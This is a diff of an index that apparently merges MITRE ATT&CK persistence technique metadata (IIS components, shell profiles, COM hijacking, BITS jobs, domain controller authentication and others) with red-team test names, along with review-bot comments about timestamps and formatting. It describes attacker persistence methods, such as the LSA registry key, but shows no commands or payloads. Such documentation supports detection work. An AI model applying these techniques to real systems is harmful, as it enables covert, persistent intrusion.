x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -57322,9 +57736,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -57384,7 +57795,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
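Review bot: the description context lines here split `Get{Extension/Filter}Version`, `, Http{Extension/Filter}Proc` and `, and (optionally) Terminate{Extension/Filter}` onto separate lines with the commas at line start, which is residue from inline code markup being stripped upstream; the T1547.002 description below shows the same artefact (`HKLM\SYSTEM\CurrentControlSet\Control\Lsa\` with `with the key value of ...` continuing on its own line). Not introduced by this change, but since the index is being regenerated, having the generator collapse these stray line breaks inside `description` would make the rendered text read correctly.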
@@ -57409,8 +57820,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests:
- name: Install IIS Module using AppCmd.exe
@@ -57489,7 +57898,7 @@ persistence:
name: powershell
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -57542,8 +57951,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -57591,7 +58000,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests:
- name: Persistence with Custom AutodialDLL
@@ -57807,73 +58215,7 @@ persistence:
elevation_required: true
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -57921,6 +58263,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -57931,9 +58277,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -57942,8 +58292,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
@@ -57980,7 +58389,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -58003,7 +58412,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests:
- name: Authentication Package
@@ -58026,7 +58434,7 @@ persistence:
elevation_required: true
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -58104,7 +58512,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests:
- name: COM Hijacking - InprocServer32
@@ -58247,36 +58654,7 @@ persistence:
name: powershell
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -58285,22 +58663,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests:
- name: Install Outlook Home Page Persistence
@@ -58338,7 +58743,7 @@ persistence:
'
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -58399,7 +58804,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
@@ -58471,7 +58875,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -58493,7 +58897,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -58574,7 +58977,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -58597,7 +58999,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -58627,12 +59029,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -58722,7 +59122,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -58852,7 +59251,7 @@ persistence:
name: command_prompt
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -58937,7 +59336,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -59061,7 +59459,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -59100,13 +59497,13 @@ persistence:
elevation_required: true
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -59139,10 +59536,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
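Review bot: for T1556.009 this hunk removes `SaaS` as well as `Azure AD`, leaving only `IaaS` and `Identity Provider`, whereas the other platform consolidations in this diff (T1078, T1556.006) keep `SaaS` alongside the new `Office Suite` and `Identity Provider` values. Worth confirming against the upstream technique data that dropping `SaaS` here is the intended change and not an artefact of the regeneration.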
@@ -59179,7 +59575,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -59253,7 +59648,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
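Review bot: the `modified` timestamp here moves backward, from '2022-05-11T14:00:00.188Z' to '2022-04-21T16:13:00.598Z', and the same regression appears for T1505, T1547.007, T1574.002, T1037.001, T1547.008 and T1546.007 in later hunks. Most of the old values in that set share the identical time-of-day `14:00:00.188Z`, which looks like a bulk stamp rather than a real object modification time, so the new values are plausibly the genuine upstream timestamps; still, state in the PR which ATT&CK bundle the index was regenerated from so a reviewer can confirm the backward move is expected.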
@@ -59281,12 +59676,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -59345,33 +59739,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -59392,6 +59763,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -59406,52 +59778,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
